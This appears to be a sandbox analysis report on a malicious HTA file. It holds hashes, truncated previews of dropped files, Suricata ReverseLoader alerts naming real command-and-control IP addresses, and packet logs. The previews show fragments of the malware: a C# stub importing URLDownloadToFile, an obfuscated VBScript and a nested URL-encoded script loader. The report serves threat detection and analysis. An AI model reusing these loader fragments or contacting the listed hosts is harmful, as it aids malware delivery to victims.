SHA-512:	9A387056470CD7B1CADC638CA29227303A6C447EB551D219FBF0FB0E4C4265D9B9D40E3830088BB8EAE3626CEB827DE0CCB827C68B5D6A878AC1D1D17056D9AE
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace HSbfoVpn.{. public class dfB. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dCbpccxuQQm,string IzMm,string ZivdTpV,uint fUyFHsgNe,IntPtr kUOzHcflzy);.. }..}.

C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.179455027942296
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fcpVYJJUzxs7+AEszIN723fcpVe:p37Lvkmb6K2aM2HUWZETaMU
MD5:	74D11A1F68AF263B337F6A84FE99621F
SHA1:	F338AADCBB96483B022279A1A4480A933655B848
SHA-256:	A98918484C96AF8A47187092856F97222D7FDCA170203F8A96E07C79C5C0FDB7
SHA-512:	23122F9248D81CFCD226EBEE274E008C951DBBC3BECC98F9BDA24EF050549D0812A481AA57B7192FD7D81BF5C431B38409595A1B6E9B3315E2D8AB8C68A83D82
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.0.cs"

C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8500168638868226
Encrypted:	false
SSDEEP:	24:etGSlpeYYLPl78cBOkgVA/H9p5StkZfdmElVTyAFWI+ycuZhNJakSXPNnq:6OYwPlICcA/dhJdLD+91ulJa3Fq
MD5:	E4A80148D78F7DFF6626BD630A7E0F9C
SHA1:	65C71A79AF0659352924717375A231647ED8F0E0
SHA-256:	931D5B8B59851BD812473EDBF27AA7161BDA49CEEBD9C94C9758BD255A85A9CB
SHA-512:	CC4E035EC75F2DF090F27F6E38E1506629DBC28F85B632F7493EC91E24472463B8374D8BFEE5A434E4E17AEDB02345913D7F6160DB0170BA6E248BB16B0060D2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(.=g...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-...................................................... ;.....P ......M.........S....._.....d.....l.....v...M.....M...!.M.....M.......!............;.......................................$..........<Module>.nd

C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
Category:	modified
Size (bytes):	876
Entropy (8bit):	5.278639797979723
Encrypted:	false
SSDEEP:	24:KOuqd3ka6K2aNH1ETaeKax5DqBVKVrdFAMBJTH:yika6CNVE+eK2DcVKdBJj
MD5:	8BB9A66E57C71CA94E6B8D2355AAC8A4
SHA1:	6C7233E2B1086BAF2B0A4B17C64DBB5C9124D8AE
SHA-256:	ECE19217613A2D12EE7D5668768A5FAAD2A0BE3A396D30F81FCAD92CA651DC61
SHA-512:	212676EB036BD6E2F6C0EFA62E33A9DCA253C366773F3BF80BC4FA3F3F06994B6F60E1CC1F01EEF681C31EC9F984CA3FE004FD695CBB515733137A28C67CBF3D
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
Category:	dropped
Size (bytes):	142098
Entropy (8bit):	3.6737957798783647
Encrypted:	false
SSDEEP:	3072:AFdRjwsHv2A7n6J7V5VmnldvvMnKjggt5pMGwm:SdP2A7nC8nr
MD5:	2A43F3918D91622E9CCAC7889F3E6DC2
SHA1:	7D6131261E7F6A54291BD9E02EB7C985E093CFA7
SHA-256:	95F59C4235C1D4516B7D5DE5A768F0F00C4A64C73A5BE26FB26496AC5F378E9B
SHA-512:	422B39ACB1DCACC05938EE122FA614A9A429E28A6A7F7ECF8A7F8416823B0E7ADA11C28B7FE52AE1352D85FC99423FFDB16FD85EC2AC27F25A2F3ADFED7B638C
Malicious:	true
Preview:	..........F.u.n.c.t.i.o.n. .d.e.s.c.a.b.i.d.o.(.B.y.V.a.l. .e.s.p.i.n.e.t.a.,. .B.y.V.a.l. .m.a.l.h.a.d.o.,. .B.y.V.a.l. .c.o.n.u.b.i.a.l.)..... . . . .D.i.m. .d.e.s.c.o.a.l.h.o..... . . . .d.e.s.c.o.a.l.h.o. .=. .I.n.S.t.r.(.e.s.p.i.n.e.t.a.,. .m.a.l.h.a.d.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .d.e.s.c.o.a.l.h.o. .>. .0..... . . . . . . . .e.s.p.i.n.e.t.a. .=. .L.e.f.t.(.e.s.p.i.n.e.t.a.,. .d.e.s.c.o.a.l.h.o. .-. .1.). .&. .c.o.n.u.b.i.a.l. .&. .M.i.d.(.e.s.p.i.n.e.t.a.,. .d.e.s.c.o.a.l.h.o. .+. .L.e.n.(.m.a.l.h.a.d.o.).)..... . . . . . . . .d.e.s.c.o.a.l.h.o. .=. .I.n.S.t.r.(.d.e.s.c.o.a.l.h.o. .+. .L.e.n.(.c.o.n.u.b.i.a.l.).,. .e.s.p.i.n.e.t.a.,. .m.a.l.h.a.d.o.)..... . . . .L.o.o.p..... . . . ..... . . . .d.e.s.c.a.b.i.d.o. .=. .e.s.p.i.n.e.t.a.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . . . .R.e.a.d.S.t.d.I.n. .=. .R.e.a.d.S.t.d.I.n. .&. .

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	2.0025860419599777
TrID:
File name:	seethebestthingswithgreatsituationshandletotheprogress.hta
File size:	182'577 bytes
MD5:	01928c833c9940a6896666a9d93b9670
SHA1:	abe22dd055a6fa39c615cf72818e474f2525e7ae
SHA256:	fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa
SHA512:	e34bc23996ab1ec12117e463f8b8ec5b4e880635d435286d3e4d09c8499c044dd2f92d8c2927e1435287691ae14dc1e1f7331c2aeae103ca9ac56022b9d883e0
SSDEEP:	48:4vahW5oZz7eWLB2CCz7lRo7dmz7lOwo7dO81bBPW1zKfD299Ddaq6bWyxf9DZRDf:4vCl17nuYMiFeAqfoqyWyflRJm0cfQ
TLSH:	80048862EE304CCCB3DC5E977AFC32D8747CA76BA7CA0E92945B3541D89139C98D142A
File Content Preview:	<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%25252

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-20T08:27:55.958509+0100	2057635	ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound	1	192.3.22.13	80	192.168.2.6	54436	TCP
2024-11-20T08:27:55.958509+0100	2858295	ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)	1	192.3.22.13	80	192.168.2.6	54436	TCP
2024-11-20T08:28:05.608028+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.6	49712	192.3.22.13	80	TCP
2024-11-20T08:28:13.048884+0100	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	142.215.209.78	443	192.168.2.6	49725	TCP
2024-11-20T08:28:28.835822+0100	2858796	ETPRO MALWARE ReverseLoader Payload Request (GET) M1	1	192.168.2.6	54436	192.3.22.13	80	TCP
2024-11-20T08:28:29.009764+0100	2020423	ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound	1	192.3.22.13	80	192.168.2.6	54436	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 08:28:04.997900009 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.003056049 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.003143072 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.003329992 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.008209944 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.607850075 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.607914925 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.607952118 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.607970953 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.607988119 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.608004093 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.608021975 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.608027935 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.608048916 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.608064890 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.608081102 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.608088970 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.608108997 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.608133078 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.613013029 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.613033056 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.613070965 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.613089085 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.671964884 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.672049046 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.700042009 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700078964 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700138092 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700176001 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700198889 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.700213909 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700231075 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.700253963 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700267076 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.700359106 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.700743914 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700798988 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700822115 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.700834990 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700843096 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.700871944 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700881004 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.700922012 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.700926065 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.700970888 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.701559067 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.701611996 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.701627970 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.701669931 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.701683998 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.701719999 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.701745033 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.701760054 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.701765060 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.701805115 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.702471972 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.702526093 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.702533007 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.702567101 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.702575922 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.702603102 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.702640057 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.702645063 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.702714920 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.703428030 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.703486919 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.703525066 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.703571081 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.705173969 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.705266953 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.793751955 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.793831110 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.793828964 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.793874025 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.793876886 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.793910027 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.793922901 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.793948889 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.793953896 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.793982983 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.793994904 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794019938 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794019938 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794055939 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794080019 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794114113 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794114113 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794150114 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794178963 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794193983 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794197083 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794224977 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794275999 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794279099 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794312954 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794322968 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794353962 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794388056 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794399977 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794421911 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794440031 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794456959 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794462919 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794492006 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794495106 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794528008 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794529915 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794568062 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794869900 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794904947 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794920921 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794939041 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794941902 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.794975042 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.794979095 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795010090 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795015097 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795047045 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795047998 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795089006 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795259953 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795300961 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795310020 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795351028 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795365095 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795418024 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795452118 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795485973 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795504093 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795505047 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795505047 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795519114 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795527935 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795553923 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795572042 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795599937 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795881987 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795917034 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795938969 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795952082 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.795955896 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.795989990 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.796137094 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.796173096 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.796186924 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.796207905 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.796207905 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.796243906 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.796250105 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.796278954 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.796286106 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.796315908 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.796320915 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.796394110 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.796582937 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.796617985 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.796653032 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.796657085 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.796681881 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.796761036 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.800327063 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.800362110 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.800395012 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.800396919 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.800422907 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.800431967 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.800438881 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.800476074 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.800556898 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.800592899 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.800606012 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.800628901 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.800681114 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886003017 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886068106 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886094093 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886126995 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886141062 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886173010 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886176109 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886190891 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886209011 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886218071 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886240005 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886248112 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886270046 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886281967 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886301041 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886310101 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886331081 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886339903 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886360884 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886380911 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886388063 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886396885 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886419058 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886425018 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886451006 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886456013 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886493921 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886662006 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886691093 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886735916 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886739969 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886766911 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886796951 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886816025 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886828899 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.886832952 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.886869907 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887022972 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887051105 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887061119 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887104034 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887104988 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887142897 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887147903 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887180090 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887187004 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887216091 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887224913 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887253046 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887265921 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887289047 CET	80	49712	192.3.22.13	192.168.2.6
